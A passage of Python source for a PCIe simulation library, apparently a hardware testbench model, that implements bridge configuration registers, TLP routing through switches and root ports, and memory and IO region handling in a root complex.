False\n\n self.upstream_port = Port(self, self.upstream_recv)\n self.upstream_tx_handler = self.upstream_port.send\n\n self.downstream_port = Port(self, self.downstream_recv)\n self.downstream_tx_handler = self.downstream_port.send\n\n \"\"\"\n Bridge (type 1) config space\n\n 31 0\n +---------------------------------+---------------------------------+\n | Device ID | Vendor ID | 0 0x00\n +---------------------------------+---------------------------------+\n | Status | Command | 1 0x04\n +---------------------------------+----------------+----------------+\n | Class Code | Revision ID | 2 0x08\n +----------------+----------------+----------------+----------------+\n | BIST | Header Type | Primary | Cache Line | 3 0x0C\n | | | Latency Timer | Size |\n +----------------+----------------+----------------+----------------+\n | Base Address Register 0 | 4 0x10\n +-------------------------------------------------------------------+\n | Base Address Register 1 | 5 0x14\n +----------------+----------------+----------------+----------------+\n | Secondary | Subordinate | Secondary | Primary | 6 0x18\n | Latency Timer | Bus Number | Bus Number | Bus Number |\n +----------------+----------------+----------------+----------------+\n | Secondary Status | IO Limit | IO Base | 7 0x1C\n +---------------------------------+----------------+----------------+\n | Memory Limit | Memory Base | 8 0x20\n 
+---------------------------------+---------------------------------+\n | Prefetchable Memory Limit | Prefetchable Memory Base | 9 0x24\n +---------------------------------+---------------------------------+\n | Prefetchable Base Upper 32 | 10 0x28\n +-------------------------------------------------------------------+\n | Prefetchable Limit Upper 32 | 11 0x2C\n +---------------------------------+---------------------------------+\n | IO Lim Upper 16 | IO Base Upper 16 | 12 0x30\n +---------------------------------+----------------+----------------+\n | Reserved | Cap Ptr | 13 0x34\n +--------------------------------------------------+----------------+\n | Expansion ROM Base Address | 14 0x38\n +---------------------------------+----------------+----------------+\n | Bridge Control | Int Pin | Int Line | 15 0x3C\n +---------------------------------+----------------+----------------+\n\n \"\"\"\n def read_config_register(self, reg):\n if reg == 4: return self.bar[0]\n elif reg == 5: return self.bar[1]\n elif reg == 6: return (self.sec_lat_timer << 24) | (self.sub_bus_num << 16) | (self.sec_bus_num << 8) | self.pri_bus_num\n elif reg == 7: return (self.sec_status << 16) | (self.io_limit & 0xf000) | ((self.io_base & 0xf000) >> 8)\n elif reg == 8: return (self.mem_limit & 0xfff00000) | ((self.mem_base & 0xfff00000) >> 16)\n elif reg == 9: return (self.prefetchable_mem_limit & 0xfff00000) | ((self.prefetchable_mem_base & 0xfff00000) >> 16)\n elif reg == 10: return self.prefetchable_mem_base >> 32\n elif reg == 11: return self.prefetchable_mem_limit >> 32\n elif reg == 12: return (self.io_limit & 0xffff0000) | ((self.io_base & 0xffff0000) >> 16)\n elif reg == 13: return self.cap_ptr\n elif reg == 14: return self.expansion_rom_addr\n elif reg == 15: return (self.bridge_control << 16) | (self.intr_pin << 8) | self.intr_line\n else: return super(Bridge, self).read_config_register(reg)\n\n def write_config_register(self, reg, data, mask):\n if reg == 4:\n self.bar[0] = byte_mask_update(self.bar[0], mask, data, self.bar_mask[0])\n elif reg == 5:\n self.bar[1] = byte_mask_update(self.bar[1], mask, data, self.bar_mask[1])\n elif reg == 6:\n self.pri_bus_num = byte_mask_update(self.pri_bus_num, mask & 0x1, data)\n self.sec_bus_num = byte_mask_update(self.sec_bus_num, (mask >> 1) & 1, data >> 8)\n self.sub_bus_num = byte_mask_update(self.sub_bus_num, (mask >> 2) & 1, data >> 16)\n self.sec_lat_timer = byte_mask_update(self.sec_lat_timer, (mask >> 3) & 1, data >> 24)\n elif reg == 7:\n self.io_base = byte_mask_update(self.io_base, (mask & 0x1) << 1, data << 8, 0xf000)\n self.io_limit = byte_mask_update(self.io_limit, (mask & 0x2), data, 0xf000) | 0xfff\n self.sec_status = byte_mask_update(self.sec_status, (mask >> 2) & 1, 0x0000, (data >> 16) & 0xf900)\n elif reg == 8:\n self.mem_base = byte_mask_update(self.mem_base, (mask & 0x3) << 2, data << 16, 0xfff00000)\n self.mem_limit = byte_mask_update(self.mem_limit, (mask & 0xc), data, 0xfff00000) | 0xfffff\n elif reg == 9:\n self.prefetchable_mem_base = byte_mask_update(self.prefetchable_mem_base, (mask & 0x3) << 2, data << 16, 0xfff00000)\n self.prefetchable_mem_limit = byte_mask_update(self.prefetchable_mem_limit, (mask & 0xc), data, 0xfff00000) | 0xfffff\n elif reg == 10:\n self.prefetchable_mem_base = byte_mask_update(self.prefetchable_mem_base, mask << 4, data << 32)\n elif reg == 11:\n self.prefetchable_mem_limit = byte_mask_update(self.prefetchable_mem_limit, mask << 4, data << 32)\n elif reg == 12:\n self.io_base = byte_mask_update(self.io_base, (mask & 
0x3) << 2, data << 16)\n self.io_limit = byte_mask_update(self.io_limit, (mask & 0xc), data)\n elif reg == 14:\n self.expansion_rom_addr = byte_mask_update(self.expansion_rom_addr, mask, data)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 0x1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n self.bridge_control = byte_mask_update(self.bridge_control, (mask >> 2) & 3, data >> 16, 0x0043)\n else:\n super(Bridge, self).write_config_register(reg, data, mask)\n\n def upstream_send(self, tlp):\n assert tlp.check()\n if self.upstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.upstream_tx_handler(tlp)\n\n def upstream_recv(self, tlp):\n # logging\n if trace_routing:\n print(\"[%s] Routing downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n yield from self.handle_tlp(tlp)\n elif tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1:\n # config type 1\n if self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n if tlp.dest_id.bus == self.sec_bus_num:\n # targeted to directly connected device; change to type 0\n if tlp.fmt_type == TLP_CFG_READ_1:\n tlp.fmt_type = TLP_CFG_READ_0\n elif tlp.fmt_type == TLP_CFG_WRITE_1:\n tlp.fmt_type = TLP_CFG_WRITE_0\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if not self.root and tlp.requester_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.requester_id.bus <= self.sub_bus_num:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed message\n if not self.root and tlp.dest_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if self.match_bar(tlp.address, io=True):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.io_base <= tlp.address <= self.io_limit:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if self.match_bar(tlp.address):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.mem_base <= tlp.address <= self.mem_limit or self.prefetchable_mem_base <= tlp.address <= self.prefetchable_mem_limit:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n yield from self.route_downstream_tlp(tlp, False)\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n # error\n pass\n else:\n # logging\n raise Exception(\"Unknown/invalid 
packet type\")\n\n def route_downstream_tlp(self, tlp, from_downstream=False):\n yield from self.downstream_send(tlp)\n\n def downstream_send(self, tlp):\n assert tlp.check()\n if self.downstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.downstream_tx_handler(tlp)\n\n def downstream_recv(self, tlp):\n # logging\n if trace_routing:\n print(\"[%s] Routing upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if (tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0 or\n tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1):\n # error\n pass\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if not self.root and tlp.requester_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.requester_id.bus <= self.sub_bus_num:\n if self.root and tlp.requester_id.bus == self.pri_bus_num and tlp.requester_id.device == 0:\n yield from self.upstream_send(tlp)\n else:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed messages\n if not self.root and tlp.dest_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n if self.root and tlp.dest_id.bus == self.pri_bus_num and tlp.dest_id.device == 0:\n yield from self.upstream_send(tlp)\n else:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if self.match_bar(tlp.address, io=True):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.io_base <= tlp.address <= self.io_limit:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if self.match_bar(tlp.address):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.mem_base <= tlp.address <= self.mem_limit or self.prefetchable_mem_base <= tlp.address <= self.prefetchable_mem_limit:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n raise Exception(\"TODO\")\n else:\n raise Exception(\"Unknown/invalid packet type\")\n\n def send(self, tlp):\n # route local transmissions as if they came in via downstream port\n yield from self.downstream_recv(tlp)\n\n\nclass SwitchUpstreamPort(Bridge):\n def __init__(self, *args, **kwargs):\n super(SwitchUpstreamPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x5\n\n self.downstream_port = BusPort(self, self.downstream_recv)\n self.downstream_tx_handler = None\n\n self.desc = \"SwitchUpstreamPort\"\n\n self.vendor_id = 0x1234\n 
self.device_id = 0x0003\n\n def route_downstream_tlp(self, tlp, from_downstream=False):\n assert tlp.check()\n\n # route downstream packet\n ok = False\n for p in self.downstream_port.other:\n dev = p.parent\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n # config type 0\n if tlp.dest_id.device == dev.device_num and tlp.dest_id.function == dev.function_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1:\n # config type 1\n if isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.dest_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if tlp.requester_id == dev.get_id():\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.requester_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed message\n if tlp.dest_id == dev.get_id():\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.requester_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if dev.match_bar(tlp.address, True):\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.io_base <= tlp.address <= dev.io_limit:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if dev.match_bar(tlp.address):\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and (dev.mem_base <= tlp.address <= dev.mem_limit or dev.prefetchable_mem_base <= tlp.address <= dev.prefetchable_mem_limit):\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n yield from p.ext_recv(TLP(tlp))\n ok = True\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n # error\n pass\n else:\n # logging\n raise Exception(\"Unknown/invalid packet type\")\n\n if not ok:\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n if from_downstream:\n yield from self.route_downstream_tlp(cpl, False)\n else:\n yield from self.upstream_send(cpl)\n\n\nclass SwitchDownstreamPort(Bridge):\n def __init__(self, *args, **kwargs):\n super(SwitchDownstreamPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x6\n\n self.desc = \"SwitchDownstreamPort\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0004\n\n def connect(self, port):\n self.downstream_port.connect(port)\n\n\nclass HostBridge(SwitchUpstreamPort):\n def __init__(self, *args, **kwargs):\n super(HostBridge, self).__init__(*args, **kwargs)\n\n self.desc = \"HostBridge\"\n\n self.vendor_id = 0x1234\n self.device_id = 
0x0001\n\n self.pri_bus_num = 0\n self.sec_bus_num = 0\n self.sub_bus_num = 255\n\n\nclass RootPort(SwitchDownstreamPort):\n def __init__(self, *args, **kwargs):\n super(RootPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x4\n\n self.desc = \"RootPort\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0002\n\n def connect(self, port):\n self.downstream_port.connect(port)\n\n\nclass Device(object):\n \"\"\"PCIe device, container for multiple functions\"\"\"\n def __init__(self, eps=None):\n self.bus_num = 0\n self.device_num = 0\n\n self.desc = \"Device\"\n\n self.default_function = Endpoint\n\n self.functions = []\n self.upstream_port = Port(self, self.upstream_recv)\n\n if eps:\n try:\n for ep in eps:\n self.append_function(ep)\n except:\n self.append_function(eps)\n\n def get_desc(self):\n return \"%02x:%02x %s\" % (self.bus_num, self.device_num, self.desc)\n\n def next_free_function_number(self):\n self.functions.sort(key=lambda x: x.function_num)\n if not self.functions:\n return 0\n for x in range(len(self.functions)):\n if self.functions[x].function_num != x:\n return x\n if len(self.functions) < 8:\n return len(self.functions)\n return None\n\n def add_function(self, function):\n for f in self.functions:\n if f.function_num == function.function_num:\n raise Exception(\"Function number already in use\")\n function.upstream_tx_handler = self.upstream_send\n self.functions.append(function)\n self.functions.sort(key=lambda x: x.function_num)\n if len(self.functions) > 1:\n for f in self.functions:\n f.header_type |= 0x80\n return function\n\n def append_function(self, function):\n function.function_num = self.next_free_function_number()\n return self.add_function(function)\n\n def make_function(self):\n return self.append_function(self.default_function())\n\n def connect(self, port):\n self.upstream_port.connect(port)\n\n def upstream_recv(self, tlp):\n # logging\n print(\"[%s] Got downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n # config type 0\n\n if tlp.dest_id.device == self.device_num:\n # capture address information\n self.bus_num = tlp.dest_id.bus\n\n for f in self.functions:\n f.bus_num = self.bus_num\n\n # pass TLP to function\n for f in self.functions:\n if f.function_num == tlp.dest_id.function:\n yield from f.upstream_recv(tlp)\n return\n\n #raise Exception(\"Function not found\")\n print(\"Function not found\")\n else:\n print(\"Device number mismatch\")\n \n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completion\n\n if tlp.requester_id.bus == self.bus_num and tlp.requester_id.device == self.device_num:\n for f in self.functions:\n if f.function_num == tlp.requester_id.function:\n yield from f.upstream_recv(tlp)\n return\n\n print(\"Function not found\")\n else:\n print(\"Bus/device number mismatch\")\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n\n for f in self.functions:\n if f.match_bar(tlp.address, True):\n yield from f.upstream_recv(tlp)\n return\n\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, 
self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n\n for f in self.functions:\n if f.match_bar(tlp.address):\n yield from f.upstream_recv(tlp)\n return\n\n print(\"Memory request did not match any BARs\")\n\n if tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64:\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n else:\n raise Exception(\"TODO\")\n\n def upstream_send(self, tlp):\n # logging\n print(\"[%s] Sending upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.upstream_port.send(tlp)\n\n def send(self, tlp):\n yield from self.upstream_send(tlp)\n\n\nclass Switch(object):\n \"\"\"Switch object, container for switch bridges and associated interconnect\"\"\"\n def __init__(self, *args, **kwargs):\n super(Switch, self).__init__(*args, **kwargs)\n self.upstream_bridge = SwitchUpstreamPort()\n\n self.default_switch_port = SwitchDownstreamPort\n\n self.min_dev = 1\n self.endpoints = []\n\n def next_free_device_number(self):\n self.endpoints.sort(key=lambda x: (x.device_num, x.function_num))\n d = self.min_dev\n if not self.endpoints:\n return d\n for ep in self.endpoints:\n if ep.device_num > d:\n return d\n d = ep.device_num + 1\n if d < 32:\n return d\n return None\n\n def append_endpoint(self, ep):\n ep.upstream_tx_handler = self.upstream_bridge.downstream_recv\n self.endpoints.append(ep)\n self.endpoints.sort(key=lambda x: (x.device_num, x.function_num))\n return ep\n\n def add_endpoint(self, ep):\n ep.bus_num = 0\n ep.device_num = self.next_free_device_number()\n ep.function_num = 0\n return self.append_endpoint(ep)\n\n def make_port(self):\n port = self.default_switch_port()\n self.upstream_bridge.downstream_port.connect(port.upstream_port)\n port.pri_bus_num = 0\n port.sec_bus_num = 0\n port.sub_bus_num = 0\n return self.add_endpoint(port)\n\n def connect(self, port):\n self.upstream_bridge.upstream_port.connect(port)\n\n\nclass TreeItem(object):\n def __init__(self):\n self.bus_num = 0\n self.device_num = 0\n self.function_num = 0\n\n self.vendor_id = 0\n self.device_id = 0\n\n self.desc = \"(Unknown)\"\n\n self.sec_bus_num = 0\n self.sub_bus_num = 0\n\n self.bar = [None]*6\n self.bar_size = [None]*6\n\n self.io_base = 0\n self.io_limit = 0\n self.mem_base = 0\n self.mem_limit = 0\n self.prefetchable_mem_base = 0\n self.prefetchable_mem_limit = 0\n\n self.capabilities = []\n self.ext_capabilities = []\n\n self.msi_addr = None\n self.msi_data = None\n\n self.children = []\n\n def find_dev(self, dev_id):\n if dev_id == self.get_id():\n return self\n for c in self.children:\n res = c.find_dev(dev_id)\n if res is not None:\n return res\n return None\n\n def get_capability_offset(self, cap_id):\n for c in self.capabilities:\n if c[0] == cap_id:\n return c[1]\n return None\n\n def to_str(self, prefix=''):\n s = ''\n\n if self.sub_bus_num > self.sec_bus_num:\n s += '[%02x-%02x]-' % (self.sec_bus_num, self.sub_bus_num)\n prefix += ' '*8\n else:\n s += '[%02x]-' % (self.sec_bus_num)\n prefix += ' '*5\n\n for i in range(len(self.children)):\n c = self.children[i]\n\n if i > 0:\n s += prefix\n\n 
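# connector choice for this child entry: '-' when it is an only child, a backslash when it is the last sibling, '+' otherwise, so the output reads like an lspci -t style tree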
if len(self.children) == 1:\n s += '-'\n elif len(self.children)-1 == i:\n s += '\\\\'\n else:\n s += '+'\n\n s += '-%02x.%x' % (c.device_num, c.function_num)\n\n if c.children:\n if i < len(self.children)-1:\n s += '-'+c.to_str(prefix+'|'+' '*6).strip()\n else:\n s += '-'+c.to_str(prefix+' '*7).strip()\n\n s += '\\n'\n\n return s\n\n def get_id(self):\n return PcieId(self.bus_num, self.device_num, self.function_num)\n\n def __bool__(self):\n return True\n\n def __getitem__(self, key):\n return self.children[key]\n\n def __iter__(self):\n return self.children.__iter__()\n \n def __len__(self):\n return len(self.children)\n\n\nclass RootComplex(Switch):\n def __init__(self, *args, **kwargs):\n super(RootComplex, self).__init__(*args, **kwargs)\n\n self.default_switch_port = RootPort\n\n self.min_dev = 1\n\n self.current_tag = 0\n\n self.downstream_tag_recv_queues = {}\n\n self.rx_cpl_queues = [[] for k in range(256)]\n self.rx_cpl_sync = [Signal(False) for k in range(256)]\n\n self.rx_tlp_handler = {}\n\n self.upstream_bridge = HostBridge()\n self.upstream_bridge.root = True\n self.upstream_bridge.upstream_tx_handler = self.downstream_recv\n\n self.tree = TreeItem()\n\n self.io_base = 0x80000000\n self.io_limit = self.io_base\n self.mem_base = 0x80000000\n self.mem_limit = self.mem_base\n self.prefetchable_mem_base = 0x8000000000000000\n self.prefetchable_mem_limit = self.prefetchable_mem_base\n\n self.upstream_bridge.io_base = self.io_base\n self.upstream_bridge.io_limit = self.io_limit\n self.upstream_bridge.mem_base = self.mem_base\n self.upstream_bridge.mem_limit = self.mem_limit\n self.upstream_bridge.prefetchable_mem_base = self.prefetchable_mem_base\n self.upstream_bridge.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n self.max_payload_size = 0\n self.max_read_request_size = 2\n self.read_completion_boundary = 128\n self.extended_tag_field_enable = True\n\n self.region_base = 0\n self.region_limit = self.region_base\n\n self.io_region_base = 0\n self.io_region_limit = self.io_region_base\n\n self.regions = []\n self.io_regions = []\n\n self.msi_addr = None\n self.msi_msg_limit = 0\n self.msi_signals = {}\n self.msi_callbacks = {}\n\n self.register_rx_tlp_handler(TLP_IO_READ, self.handle_io_read_tlp)\n self.register_rx_tlp_handler(TLP_IO_WRITE, self.handle_io_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ_64, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE, self.handle_mem_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE_64, self.handle_mem_write_tlp)\n\n def get_desc(self):\n #return \"%02x:%02x.%x %s\" % (self.bus_num, self.device_num, self.function_num, self.desc)\n return \"RootComplex\"\n\n def alloc_region(self, size, read=None, write=None):\n addr = 0\n mem = None\n\n addr = align(self.region_limit, 2**math.ceil(math.log(size, 2))-1)\n self.region_limit = addr+size-1\n if not read and not write:\n mem = mmap.mmap(-1, size)\n self.regions.append((addr, size, mem))\n else:\n self.regions.append((addr, size, read, write))\n\n return addr, mem\n\n def alloc_io_region(self, size, read=None, write=None):\n addr = 0\n mem = None\n\n addr = align(self.io_region_limit, 2**math.ceil(math.log(size, 2))-1)\n self.io_region_limit = addr+size-1\n if not read and not write:\n mem = mmap.mmap(-1, size)\n self.io_regions.append((addr, size, mem))\n else:\n self.io_regions.append((addr, size, read, write))\n\n return addr, mem\n\n def find_region(self, addr):\n for region in 
self.regions:\n if region[0] <= addr < region[0]+region[1]:\n return region\n return None\n\n def find_io_region(self, addr):\n for region in self.io_regions:\n if region[0] <= addr < region[0]+region[1]:\n return region\n return None\n\n def read_region(self, addr, length):\n # a 3-tuple region wraps a backing mmap; a 4-tuple region wraps (read, write) callbacks\n region = self.find_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n return region[2][offset:offset+length]\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[2]):\n return (yield from region[2](offset, length))\n else:\n return region[2](offset, length)\n\n def write_region(self, addr, data):\n region = self.find_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n region[2][offset:offset+len(data)] = data\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[3]):\n yield from region[3](offset, data)\n else:\n region[3](offset, data)\n\n def read_io_region(self, addr, length):\n region = self.find_io_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n return region[2][offset:offset+length]\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[2]):\n return (yield from region[2](offset, length))\n else:\n return region[2](offset, length)\n\n def write_io_region(self, addr, data):\n region = self.find_io_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n region[2][offset:offset+len(data)] = data\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[3]):\n yield from region[3](offset, data)\n else:\n region[3](offset, data)\n\n def downstream_send(self, tlp):\n # logging\n print(\"[%s] Sending TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.upstream_bridge.upstream_recv(tlp)\n\n def send(self, tlp):\n yield from self.downstream_send(tlp)\n\n def downstream_recv(self, tlp):\n # logging\n print(\"[%s] Got TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.handle_tlp(tlp)\n\n def handle_tlp(self, tlp):\n if (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n self.rx_cpl_queues[tlp.tag].append(tlp)\n self.rx_cpl_sync[tlp.tag].next = not self.rx_cpl_sync[tlp.tag]\n elif tlp.fmt_type in self.rx_tlp_handler:\n yield self.rx_tlp_handler[tlp.fmt_type](tlp)\n else:\n raise Exception(\"Unhandled TLP\")\n\n def register_rx_tlp_handler(self, fmt_type, func):\n self.rx_tlp_handler[fmt_type] = func\n\n def recv_cpl(self, tag, timeout=0):\n queue = self.rx_cpl_queues[tag]\n sync = self.rx_cpl_sync[tag]\n\n if timeout:\n yield sync, delay(timeout)\n else:\n yield sync\n\n if queue:\n return queue.pop(0)\n\n return None\n\n def get_free_tag(self):\n tag_count = 32\n\n for k in range(tag_count):\n self.current_tag = (self.current_tag + 1) % tag_count\n if not self.rx_cpl_queues[self.current_tag]:\n return self.current_tag\n\n return None\n\n def handle_io_read_tlp(self, tlp):\n if self.find_io_region(tlp.address):\n # logging\n print(\"[%s] IO read\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion_data(tlp, PcieId(0, 0, 0))\n\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform read\n data = bytearray(4)\n\n for k in range(4):\n if 